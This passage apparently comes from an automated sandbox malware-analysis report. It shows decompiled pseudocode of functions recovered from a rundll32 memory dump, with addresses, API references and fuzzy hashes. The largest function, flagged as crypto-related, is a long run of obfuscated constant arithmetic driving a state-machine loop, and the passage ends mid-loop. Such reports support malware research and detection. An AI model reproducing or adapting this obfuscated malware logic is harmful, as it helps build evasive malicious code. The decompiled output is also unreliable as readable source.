				ExitProcess(0);
			}









                                                                                                                      0x002c3cc1
                                                                                                                      0x002c3cc7
                                                                                                                      0x002c3cce
                                                                                                                      0x002c3cdb
                                                                                                                      0x002c3ce2
                                                                                                                      0x002c3ce5
                                                                                                                      0x002c3cec
                                                                                                                      0x002c3cf3
                                                                                                                      0x002c3cfa
                                                                                                                      0x002c3cfe
                                                                                                                      0x002c3d01
                                                                                                                      0x002c3d08
                                                                                                                      0x002c3d19
                                                                                                                      0x002c3d1c
                                                                                                                      0x002c3d31
                                                                                                                      0x002c3d3b

                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNELBASE(00000000), ref: 002C3D3B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction ID: c081b42571ba014d478c98d680b2a96988786ea213f6e823a3b828bf1f00c633
                                                                                                                      • Opcode Fuzzy Hash: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction Fuzzy Hash: 4601E2B6D0120CFBDB04DFE5D946A9DBBB0EB40304F508199E925AB290D7B85B54DF41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002CFC96 Relevance: 1.3, APIs: 1, Instructions: 41stringCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 297 2cfc96-2cfd28 call 2bcf25 call 2b2d9f lstrcmpiW
                                                                                                                      C-Code - Quality: 80%
                                                                                                                      			E002CFC96(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				void* _t32;
				int _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E002BCF25(_t32);
				_v8 = 0x178fa1;
				_v8 = _v8 | 0x2f4d5c19;
				_v8 = _v8 + 0xda24;
				_t42 = 0x35;
				_v8 = _v8 / _t42;
				_v8 = _v8 ^ 0x00e923af;
				_v16 = 0xca5f26;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x97c71065;
				_v12 = 0xeb54f5;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x0000b8cd;
				E002B2D9F(0xb8f00729, 0x289, _t42, 0xa62ab78c);
				_t40 = lstrcmpiW(_a12, _a4); // executed
				return _t40;
			}









                                                                                                                      0x002cfc9c
                                                                                                                      0x002cfc9f
                                                                                                                      0x002cfca2
                                                                                                                      0x002cfca7
                                                                                                                      0x002cfcac
                                                                                                                      0x002cfcb6
                                                                                                                      0x002cfcbf
                                                                                                                      0x002cfccb
                                                                                                                      0x002cfcd3
                                                                                                                      0x002cfcd6
                                                                                                                      0x002cfcdd
                                                                                                                      0x002cfce4
                                                                                                                      0x002cfce8
                                                                                                                      0x002cfcef
                                                                                                                      0x002cfcf6
                                                                                                                      0x002cfcfa
                                                                                                                      0x002cfd15
                                                                                                                      0x002cfd23
                                                                                                                      0x002cfd28

                                                                                                                      APIs
                                                                                                                      • lstrcmpiW.KERNELBASE(?,0000B8CD), ref: 002CFD23
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1586166983-0
                                                                                                                      • Opcode ID: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction ID: 4740e654bad4d1fd8f466bf7c748092326eba03b21d5d9c711756325b8ef8bdb
                                                                                                                      • Opcode Fuzzy Hash: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction Fuzzy Hash: D9010276D00208BFDF05EFE4C84A89EBBB1AB44304F108098EA146A250DBB69B649F40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Non-executed Functions

                                                                                                                      Function 002D1B54 Relevance: 28.6, Strings: 22, Instructions: 1066COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E002D1B54() {
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v48;
				char _v56;
				signed int _v60;
				signed int _v72;
				intOrPtr _v76;
				char _v84;
				char _v96;
				signed int _v100;
				char _v112;
				signed int _v116;
				intOrPtr _v120;
				char _v128;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				unsigned int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				unsigned int _v220;
				signed int _v224;
				signed int _v228;
				unsigned int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				unsigned int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				unsigned int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				unsigned int _v572;
				signed int _v576;
				signed int _v580;
				unsigned int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _t1099;
				signed int _t1109;
				void* _t1121;
				signed int _t1139;
				signed int _t1147;
				signed int _t1167;
				void* _t1171;
				signed int _t1172;
				signed int _t1173;
				signed int _t1174;
				signed int _t1175;
				signed int _t1176;
				signed int _t1177;
				signed int _t1178;
				signed int _t1179;
				signed int _t1180;
				signed int _t1181;
				signed int _t1182;
				signed int _t1183;
				signed int _t1184;
				signed int _t1185;
				signed int _t1186;
				signed int _t1187;
				signed int _t1272;
				signed int _t1273;
				signed int _t1279;
				void* _t1281;
				signed int _t1288;
				signed int _t1309;
				void* _t1311;
				void* _t1314;
				void* _t1315;
				void* _t1316;

				_t1311 = (_t1309 & 0xfffffff8) - 0x250;
				_v116 = _v116 & 0x00000000;
				_v120 = 0xa23e30;
				_v592 = 0x3a1cca;
				_v592 = _v592 * 0x70;
				_t1281 = 0x5cbbc19;
				_v592 = _v592 ^ 0x2f3849e0;
				_t9 =  &_v592; // 0x2f3849e0
				_t1172 = 6;
				_v592 =  *_t9 / _t1172;
				_v592 = _v592 ^ 0x090e23e8;
				_v236 = 0x87b10f;
				_v236 = _v236 << 0x10;
				_v236 = _v236 ^ 0xb10f0000;
				_v516 = 0x461834;
				_v516 = _v516 ^ 0x02f635e2;
				_t1173 = 0x21;
				_v516 = _v516 / _t1173;
				_v516 = _v516 | 0x474321ea;
				_v516 = _v516 ^ 0x4757fbfb;
				_v216 = 0xd2c0b1;
				_v216 = _v216 >> 1;
				_v216 = _v216 ^ 0x006de7f5;
				_v480 = 0xeb5e0b;
				_v480 = _v480 + 0xffffa941;
				_t1272 = 0x43;
				_v480 = _v480 / _t1272;
				_v480 = _v480 | 0xc166e67d;
				_v480 = _v480 ^ 0xc1675dee;
				_v488 = 0xe6f87d;
				_v488 = _v488 ^ 0x80ff234c;
				_v488 = _v488 ^ 0x24b1b453;
				_v488 = _v488 + 0xa7fe;
				_v488 = _v488 ^ 0xa4a91779;
				_v276 = 0x5f17b9;
				_v276 = _v276 << 3;
				_v276 = _v276 ^ 0x02fd9db5;
				_v344 = 0x4c006c;
				_v344 = _v344 >> 0xe;
				_v344 = _v344 | 0xcdf796ee;
				_v344 = _v344 ^ 0xcdf61224;
				_v200 = 0x45df15;
				_v200 = _v200 + 0x6060;
				_v200 = _v200 ^ 0x004b7917;
				_v208 = 0xca7f26;
				_v208 = _v208 ^ 0x913d6520;
				_v208 = _v208 ^ 0x91fcdbd5;
				_v588 = 0xb1f4cb;
				_v588 = _v588 + 0x6758;
				_t87 =  &_v588; // 0x6758
				_v588 =  *_t87 * 0x4f;
				_v588 = _v588 ^ 0x925d082a;
				_v588 = _v588 ^ 0xa5589431;
				_v508 = 0xf7df1e;
				_v508 = _v508 + 0xd118;
				_v508 = _v508 + 0xffffbf54;
				_v508 = _v508 + 0x17fc;
				_v508 = _v508 ^ 0x00fe0a31;
				_v380 = 0x7e02fb;
				_v380 = _v380 + 0xf589;
				_v380 = _v380 ^ 0x91d98710;
				_v380 = _v380 ^ 0x91abdaf6;
				_v504 = 0xb08a0e;
				_v504 = _v504 * 0x77;
				_t1174 = 0x77;
				_v504 = _v504 / _t1174;
				_v504 = _v504 >> 2;
				_v504 = _v504 ^ 0x002dfbde;
				_v372 = 0x813d4a;
				_t1175 = 0x6c;
				_v372 = _v372 * 0x4a;
				_v372 = _v372 / _t1175;
				_v372 = _v372 ^ 0x005da134;
				_v484 = 0x855e16;
				_v484 = _v484 ^ 0xbfb8346c;
				_t1176 = 0x5f;
				_v484 = _v484 / _t1176;
				_v484 = _v484 + 0xfcf8;
				_v484 = _v484 ^ 0x02037e81;
				_v240 = 0xec674d;
				_v240 = _v240 | 0xfc3e6c49;
				_v240 = _v240 ^ 0xfcfddb47;
				_v364 = 0x61d0f9;
				_v364 = _v364 + 0xffffb344;
				_v364 = _v364 / _t1272;
				_v364 = _v364 ^ 0x000105b5;
				_v472 = 0x31ce7b;
				_t1177 = 0x51;
				_v472 = _v472 * 0x26;
				_v472 = _v472 >> 0xc;
				_v472 = _v472 >> 3;
				_v472 = _v472 ^ 0x0004fff0;
				_v224 = 0x9583f6;
				_v224 = _v224 / _t1177;
				_v224 = _v224 ^ 0x000db43c;
				_v324 = 0x1fdef9;
				_v324 = _v324 ^ 0xa62571f8;
				_v324 = _v324 ^ 0x1b5a0dd0;
				_v324 = _v324 ^ 0xbd66a263;
				_v232 = 0xd74a0b;
				_v232 = _v232 >> 6;
				_v232 = _v232 ^ 0x0003c3e3;
				_v376 = 0x9dde1e;
				_v376 = _v376 << 4;
				_v376 = _v376 + 0x9dbb;
				_v376 = _v376 ^ 0x09d67643;
				_v172 = 0x65dbd5;
				_v172 = _v172 >> 0xf;
				_v172 = _v172 ^ 0x000c80e9;
				_v400 = 0x3c4de1;
				_v400 = _v400 ^ 0xf2f914cc;
				_t1178 = 0x12;
				_v400 = _v400 / _t1178;
				_v400 = _v400 ^ 0x0d7ab358;
				_v312 = 0x3bea2f;
				_t216 =  &_v312; // 0x3bea2f
				_t1167 = 0xc;
				_v312 =  *_t216 / _t1167;
				_v312 = _v312 + 0xffff5e93;
				_v312 = _v312 ^ 0x000042d8;
				_v392 = 0x83f9ee;
				_v392 = _v392 >> 0xb;
				_v392 = _v392 * 0x24;
				_v392 = _v392 ^ 0x00021c0f;
				_v500 = 0x95bd51;
				_v500 = _v500 ^ 0x1620baa4;
				_v500 = _v500 | 0xd04cbe8c;
				_v500 = _v500 * 0x26;
				_v500 = _v500 ^ 0xe9af68de;
				_v548 = 0x57ee13;
				_v548 = _v548 | 0xcfcc72ac;
				_v548 = _v548 << 0xe;
				_v548 = _v548 + 0x6b2a;
				_v548 = _v548 ^ 0xffb12270;
				_v300 = 0xa3111e;
				_v300 = _v300 + 0xed59;
				_v300 = _v300 | 0xdcd78075;
				_v300 = _v300 ^ 0xdcf05604;
				_v432 = 0xce194f;
				_v432 = _v432 ^ 0x23730281;
				_v432 = _v432 ^ 0x3635ea1c;
				_v432 = _v432 + 0x939b;
				_v432 = _v432 ^ 0x1587da76;
				_v288 = 0x2cf49d;
				_v288 = _v288 << 3;
				_v288 = _v288 ^ 0x016df807;
				_v584 = 0x20f3bb;
				_v584 = _v584 ^ 0x1d2fae62;
				_v584 = _v584 ^ 0x98b788a9;
				_v584 = _v584 >> 4;
				_v584 = _v584 ^ 0x0858582d;
				_v464 = 0xcbd192;
				_v464 = _v464 * 0x21;
				_v464 = _v464 + 0xffff109b;
				_v464 = _v464 | 0xd92be105;
				_v464 = _v464 ^ 0xdb61e2c2;
				_v256 = 0x6d4d8e;
				_v256 = _v256 ^ 0x2793e4ee;
				_v256 = _v256 ^ 0x27fc61d0;
				_v264 = 0x15e89c;
				_v264 = _v264 * 0x43;
				_v264 = _v264 ^ 0x05baa293;
				_v568 = 0x46d03d;
				_v568 = _v568 + 0xffffbff8;
				_v568 = _v568 << 2;
				_v568 = _v568 + 0xffff0322;
				_v568 = _v568 ^ 0x011861cf;
				_v576 = 0x876e5a;
				_v576 = _v576 >> 0x10;
				_v576 = _v576 << 2;
				_v576 = _v576 << 0xa;
				_v576 = _v576 ^ 0x000133c4;
				_v552 = 0xa4c770;
				_v552 = _v552 + 0x64e6;
				_v552 = _v552 + 0xffff80c6;
				_v552 = _v552 << 2;
				_v552 = _v552 ^ 0x029c8e96;
				_v560 = 0x48961c;
				_v560 = _v560 * 0x1d;
				_v560 = _v560 * 0x3a;
				_v560 = _v560 + 0x764e;
				_v560 = _v560 ^ 0xdceaabba;
				_v412 = 0x2483ba;
				_v412 = _v412 * 0x74;
				_v412 = _v412 >> 0xa;
				_v412 = _v412 ^ 0x000035b1;
				_v416 = 0x4a6b09;
				_v416 = _v416 >> 8;
				_v416 = _v416 * 0x64;
				_v416 = _v416 ^ 0x001bf6ce;
				_v544 = 0x85ae90;
				_v544 = _v544 + 0xffff7005;
				_v544 = _v544 + 0x7ae9;
				_t1179 = 0x70;
				_v544 = _v544 * 0x32;
				_v544 = _v544 ^ 0x1a1ce9dc;
				_v396 = 0x6298d9;
				_v396 = _v396 | 0x50e275a2;
				_v396 = _v396 ^ 0x271fbe87;
				_v396 = _v396 ^ 0x77f03e33;
				_v404 = 0x9d84c7;
				_v404 = _v404 ^ 0x3ba1d94b;
				_v404 = _v404 | 0x0d5acb53;
				_v404 = _v404 ^ 0x3f764d37;
				_v528 = 0xd0c26f;
				_v528 = _v528 + 0xffffb09d;
				_v528 = _v528 << 0xb;
				_v528 = _v528 << 4;
				_v528 = _v528 ^ 0x398aae1f;
				_v388 = 0x32973e;
				_v388 = _v388 << 2;
				_v388 = _v388 * 0x2a;
				_v388 = _v388 ^ 0x213686d9;
				_v536 = 0x39ae26;
				_v536 = _v536 << 0xf;
				_v536 = _v536 << 0xa;
				_v536 = _v536 / _t1179;
				_v536 = _v536 ^ 0x00ab5ee0;
				_v248 = 0x4dbe58;
				_v248 = _v248 + 0xffff3c39;
				_v248 = _v248 ^ 0x00419814;
				_v512 = 0x88f16f;
				_v512 = _v512 ^ 0xa76fdbfb;
				_v512 = _v512 >> 6;
				_v512 = _v512 >> 8;
				_v512 = _v512 ^ 0x0003ac5e;
				_v520 = 0xecc987;
				_v520 = _v520 + 0xffffc052;
				_v520 = _v520 + 0xf02b;
				_v520 = _v520 >> 1;
				_v520 = _v520 ^ 0x007e0ff3;
				_v448 = 0xa9e1d5;
				_v448 = _v448 >> 4;
				_v448 = _v448 * 0x52;
				_v448 = _v448 + 0xffff6960;
				_v448 = _v448 ^ 0x036fa180;
				_v316 = 0x9fe24f;
				_v316 = _v316 + 0xa7e4;
				_v316 = _v316 + 0xf070;
				_v316 = _v316 ^ 0x00a7512c;
				_v192 = 0x8e20a3;
				_v192 = _v192 | 0xc4ed4dcd;
				_v192 = _v192 ^ 0xc4e9d97e;
				_v356 = 0x174f56;
				_v356 = _v356 << 0x10;
				_v356 = _v356 + 0xffffdf01;
				_v356 = _v356 ^ 0x4f50aec2;
				_v496 = 0xdc9606;
				_v496 = _v496 ^ 0x6ace7a56;
				_v496 = _v496 * 0x30;
				_v496 = _v496 + 0xfffff4e3;
				_v496 = _v496 ^ 0xe3827260;
				_v332 = 0xa7fb69;
				_v332 = _v332 * 0x63;
				_v332 = _v332 << 0xe;
				_v332 = _v332 ^ 0x8e6ea02b;
				_v340 = 0x77d063;
				_v340 = _v340 << 0x10;
				_v340 = _v340 | 0x739acc9c;
				_v340 = _v340 ^ 0xf3f6b748;
				_v348 = 0x5928cc;
				_v348 = _v348 >> 0xf;
				_t1180 = 0x18;
				_v348 = _v348 / _t1180;
				_v348 = _v348 ^ 0x000e8dd0;
				_v580 = 0xc190b9;
				_v580 = _v580 | 0xa624a591;
				_v580 = _v580 + 0xe71e;
				_v580 = _v580 << 7;
				_v580 = _v580 ^ 0x734fcbc3;
				_v272 = 0x6fe611;
				_v272 = _v272 ^ 0xf87d83ea;
				_v272 = _v272 ^ 0xf818aed7;
				_v572 = 0x6e5414;
				_v572 = _v572 >> 1;
				_v572 = _v572 + 0xffff4a68;
				_v572 = _v572 >> 2;
				_v572 = _v572 ^ 0x00016dfd;
				_v336 = 0xd3ff38;
				_v336 = _v336 + 0x8bfd;
				_v336 = _v336 + 0xd3a2;
				_v336 = _v336 ^ 0x00d246e6;
				_v328 = 0xf94d52;
				_t1273 = 0x3e;
				_v328 = _v328 / _t1273;
				_t1181 = 0x24;
				_v328 = _v328 * 0x1d;
				_v328 = _v328 ^ 0x00711f28;
				_v540 = 0x8f9a1e;
				_v540 = _v540 >> 0x10;
				_v540 = _v540 / _t1181;
				_v540 = _v540 >> 8;
				_v540 = _v540 ^ 0x00084c95;
				_v204 = 0x67c7c8;
				_v204 = _v204 ^ 0xa03849cc;
				_v204 = _v204 ^ 0xa0586462;
				_v168 = 0xf8e7c3;
				_v168 = _v168 >> 0xe;
				_v168 = _v168 ^ 0x000525ac;
				_v268 = 0x34c26b;
				_v268 = _v268 + 0xffff2a86;
				_v268 = _v268 ^ 0x0031ec13;
				_v444 = 0x3e264e;
				_v444 = _v444 + 0xffff5a03;
				_v444 = _v444 + 0xffff0530;
				_v444 = _v444 / _t1167;
				_v444 = _v444 ^ 0x0004d416;
				_v408 = 0xc2db9d;
				_v408 = _v408 >> 0xa;
				_t1182 = 0x45;
				_v408 = _v408 * 0x2e;
				_v408 = _v408 ^ 0x0003d428;
				_v284 = 0xb1ae15;
				_v284 = _v284 / _t1182;
				_v284 = _v284 ^ 0x76771441;
				_v284 = _v284 ^ 0x7674d71a;
				_v176 = 0x3bb565;
				_v176 = _v176 >> 8;
				_v176 = _v176 ^ 0x00099a5e;
				_v556 = 0x6a82d;
				_v556 = _v556 | 0x5ffe742f;
				_v556 = _v556 ^ 0x54ef9d89;
				_v556 = _v556 ^ 0x0b1ff9f1;
				_v492 = 0xf83eb1;
				_v492 = _v492 + 0xffff2212;
				_v492 = _v492 ^ 0x7ea721cb;
				_v492 = _v492 << 0xe;
				_v492 = _v492 ^ 0x104665e9;
				_v260 = 0xd66584;
				_v260 = _v260 << 0x10;
				_v260 = _v260 ^ 0x6587874e;
				_v196 = 0x15bb54;
				_t1183 = 0x25;
				_v196 = _v196 / _t1183;
				_v196 = _v196 ^ 0x00053e57;
				_v304 = 0x2a83c9;
				_v304 = _v304 + 0xffff5d87;
				_t1184 = 0x6d;
				_v304 = _v304 * 0x67;
				_v304 = _v304 ^ 0x10d4d127;
				_v368 = 0xeff39c;
				_v368 = _v368 ^ 0xf5cbb50f;
				_v368 = _v368 * 0x5c;
				_v368 = _v368 ^ 0x190e2d63;
				_v452 = 0xbc1e04;
				_v452 = _v452 << 5;
				_v452 = _v452 + 0xffffa111;
				_v452 = _v452 * 0x46;
				_v452 = _v452 ^ 0x6ded43b0;
				_v532 = 0x100915;
				_v532 = _v532 << 2;
				_v532 = _v532 / _t1184;
				_v532 = _v532 | 0x4dc043eb;
				_v532 = _v532 ^ 0x4dc2f031;
				_v180 = 0x7666bb;
				_v180 = _v180 | 0xd9d36c1a;
				_v180 = _v180 ^ 0xd9fe02b9;
				_v228 = 0x101871;
				_v228 = _v228 + 0xfd23;
				_v228 = _v228 ^ 0x00150742;
				_v320 = 0x576952;
				_v320 = _v320 ^ 0x6dcdfa8e;
				_v320 = _v320 ^ 0xbcce16b6;
				_v320 = _v320 ^ 0xd150af1c;
				_v436 = 0x61cf51;
				_v436 = _v436 | 0x824da9c6;
				_v436 = _v436 << 9;
				_t1185 = 0x60;
				_v436 = _v436 * 0x49;
				_v436 = _v436 ^ 0xb2c360cd;
				_v352 = 0xa391d1;
				_v352 = _v352 | 0xdcfa9fff;
				_v352 = _v352 ^ 0xdcf1f745;
				_v564 = 0xf1659a;
				_v564 = _v564 + 0xffff5528;
				_v564 = _v564 + 0x18ad;
				_v564 = _v564 + 0xffffd31e;
				_v564 = _v564 ^ 0x00f86590;
				_v280 = 0x69bbd1;
				_v280 = _v280 | 0xbb53cb0d;
				_v280 = _v280 ^ 0xbb7bc9ca;
				_v460 = 0x6f67b0;
				_v460 = _v460 + 0x36fc;
				_v460 = _v460 / _t1185;
				_v460 = _v460 ^ 0xf8a19ae6;
				_v460 = _v460 ^ 0xf8a43848;
				_v384 = 0x580713;
				_v384 = _v384 | 0xcbb08146;
				_v384 = _v384 ^ 0x925bb18e;
				_v384 = _v384 ^ 0x59a45563;
				_v164 = 0x5d29b5;
				_v164 = _v164 >> 0xa;
				_v164 = _v164 ^ 0x00076669;
				_v244 = 0x191d5f;
				_v244 = _v244 | 0x49e37966;
				_v244 = _v244 ^ 0x49fb1589;
				_v188 = 0x46d1ad;
				_v188 = _v188 + 0x38d0;
				_v188 = _v188 ^ 0x00414091;
				_v252 = 0x41545b;
				_v252 = _v252 + 0xffff6c46;
				_v252 = _v252 ^ 0x0041c692;
				_v220 = 0xd9c785;
				_v220 = _v220 >> 0xc;
				_v220 = _v220 ^ 0x000bd8b6;
				_v468 = 0x7d74e9;
				_v468 = _v468 + 0xffffbc8b;
				_v468 = _v468 + 0xfffffc2d;
				_t1186 = 0x57;
				_v468 = _v468 / _t1186;
				_v468 = _v468 ^ 0x0004d984;
				_v160 = 0xd5db41;
				_v160 = _v160 ^ 0xba014a41;
				_v160 = _v160 ^ 0xbad79809;
				_v596 = 0x24c82;
				_t1187 = 0x61;
				_v596 = _v596 * 0x73;
				_v596 = _v596 << 3;
				_v596 = _v596 * 0x39;
				_v596 = _v596 ^ 0xd6e8d727;
				_v212 = 0xac3173;
				_v212 = _v212 + 0xffff1aaf;
				_v212 = _v212 ^ 0x00aa5431;
				_v424 = 0x84c7ec;
				_v424 = _v424 ^ 0xbfe14e08;
				_v424 = _v424 | 0xf779bbf5;
				_v424 = _v424 ^ 0xff77ecd4;
				_v292 = 0x84a0ec;
				_v292 = _v292 >> 0xb;
				_v292 = _v292 << 9;
				_v292 = _v292 ^ 0x00233bd5;
				_v456 = 0x240b53;
				_v456 = _v456 + 0xbda;
				_v456 = _v456 * 6;
				_v456 = _v456 ^ 0x01019b0f;
				_v456 = _v456 ^ 0x00ed75ab;
				_v360 = 0x52dd0d;
				_v360 = _v360 + 0xffff4155;
				_v360 = _v360 >> 4;
				_v360 = _v360 ^ 0x000506f6;
				_v184 = 0x1af2a0;
				_v184 = _v184 + 0xffffa214;
				_v184 = _v184 ^ 0x001a94b5;
				_v308 = 0x178b81;
				_v308 = _v308 + 0xb0e7;
				_v308 = _v308 / _t1187;
				_v308 = _v308 ^ 0x00003056;
				_v440 = 0x97f304;
				_v440 = _v440 + 0xffff76b7;
				_v440 = _v440 + 0xd8b0;
				_v440 = _v440 / _t1273;
				_v440 = _v440 ^ 0x00026bef;
				_v296 = 0x8e015a;
				_v296 = _v296 | 0x4deffbbb;
				_v296 = _v296 ^ 0x4de2405b;
				_v476 = 0x8a78d0;
				_v476 = _v476 ^ 0xbcddba62;
				_v476 = _v476 | 0xa4ff36e3;
				_v476 = _v476 ^ 0xbcf24d53;
				_v428 = 0x223837;
				_v428 = _v428 << 0xc;
				_v428 = _v428 | 0x54536040;
				_v428 = _v428 >> 4;
				_v428 = _v428 ^ 0x0773c324;
				_v420 = 0x835b13;
				_v420 = _v420 >> 1;
				_v420 = _v420 ^ 0xf582999a;
				_v420 = _v420 ^ 0xf5cdc033;
				_v524 = 0xaa0f4a;
				_v524 = _v524 * 0xe;
				_v524 = _v524 + 0x1755;
				_v524 = _v524 | 0x71cd9279;
				_v524 = _v524 ^ 0x79cd8a49;
				_v156 = 0x329a17;
				_v156 = _v156 * 0x53;
				_v156 = _v156 ^ 0x10671f15;
				goto L1;
				do {
					while(1) {
						L1:
						_t1314 = _t1281 - 0x6706caa;
						if(_t1314 > 0) {
							break;
						}
						if(_t1314 == 0) {
							_t1099 = E002BBC7E();
							__eflags = _t1099;
							if(_t1099 == 0) {
								_t1099 = E002CD8D7();
							}
							L35:
							_t1281 = 0x5a8ed48;
							continue;
						}
						_t1315 = _t1281 - 0x4b8a3ed;
						if(_t1315 > 0) {
							__eflags = _t1281 - 0x5e39908;
							if(__eflags > 0) {
								__eflags = _t1281 - 0x5eb3b9d;
								if(_t1281 == 0x5eb3b9d) {
									_t1099 = E002B911A(_v304, _v368,  &_v96, _v452);
									__eflags = _t1099;
									if(_t1099 == 0) {
										_t1099 = _v100;
										__eflags = _t1099;
										if(_t1099 == 0) {
											E002BEF71(_v476, _v420);
											_t1099 = _v100;
											_pop(_t1195);
										}
										__eflags = _t1099 - 1;
										if(_t1099 == 1) {
											_t1099 = E002BEF71(_v524, _v156);
											_pop(_t1195);
										}
									} else {
										_t1279 = _v236;
									}
									_t1171 = 0x6141640;
									_t1281 = 0x6706caa;
									continue;
								}
								__eflags = _t1281 - 0x6141640;
								if(_t1281 == 0x6141640) {
									_t1099 = E002BE81F( &_v56, _v328, _v540);
									_t1281 = 0x7d1ce98;
									continue;
								}
								__eflags = _t1281 - 0x6346a73;
								if(_t1281 == 0x6346a73) {
									_t1195 = _v164;
									_t1099 = E002B68DE(_v164, _v244, _v188, _v252, _v136);
									_t1311 = _t1311 + 0xc;
									_t1281 = 0x9905489;
									continue;
								}
								__eflags = _t1281 - 0x65c604e;
								if(_t1281 != 0x65c604e) {
									goto L108;
								}
								_t1099 = E002BF93D();
								__eflags = _t1099;
								if(_t1099 == 0) {
									L112:
									return _t1099;
								}
								_t1281 = 0x3c9e136;
								continue;
							}
							if(__eflags == 0) {
								_t1099 = E002C4B56();
								asm("sbb esi, esi");
								_t1288 =  ~_t1099 & 0xf8926140;
								__eflags = _t1288;
								L43:
								_t1281 = _t1288 + 0x9aa8372;
								continue;
							}
							__eflags = _t1281 - 0x4c0b16e;
							if(_t1281 == 0x4c0b16e) {
								_t1099 = E002B83A1();
								_t1281 = 0x23ce4b2;
								continue;
							}
							__eflags = _t1281 - 0x54f2b1f;
							if(_t1281 == 0x54f2b1f) {
								_t1109 = E002C3D41(_v556,  &_v128, _v492,  &_v112);
								_pop(_t1195);
								__eflags = _t1109;
								if(_t1109 != 0) {
									_t1099 = _v100;
									__eflags = _t1099 - 8;
									if(_t1099 != 8) {
										__eflags = _t1099;
										if(_t1099 == 0) {
											L40:
											_t1281 = 0x5eb3b9d;
											continue;
										}
										__eflags = _t1099 - 1;
										if(_t1099 != 1) {
											goto L35;
										}
										goto L40;
									}
									_t1281 = 0xa9b18c1;
									continue;
								}
								_t1099 = E002BEF71(_v296, _v428);
								_pop(_t1195);
								_t1279 = _t1099;
								_t1171 = 0x6141640;
								goto L35;
							}
							__eflags = _t1281 - 0x5a8ed48;
							if(_t1281 == 0x5a8ed48) {
								_t1195 = _v564;
								_t1099 = E002B68DE(_v564, _v280, _v460, _v384, _v128);
								_t1311 = _t1311 + 0xc;
								_t1281 = 0x6346a73;
								continue;
							}
							__eflags = _t1281 - 0x5cbbc19;
							if(_t1281 != 0x5cbbc19) {
								goto L108;
							}
							_t1281 = 0xd9c2f68;
							continue;
						}
						if(_t1315 == 0) {
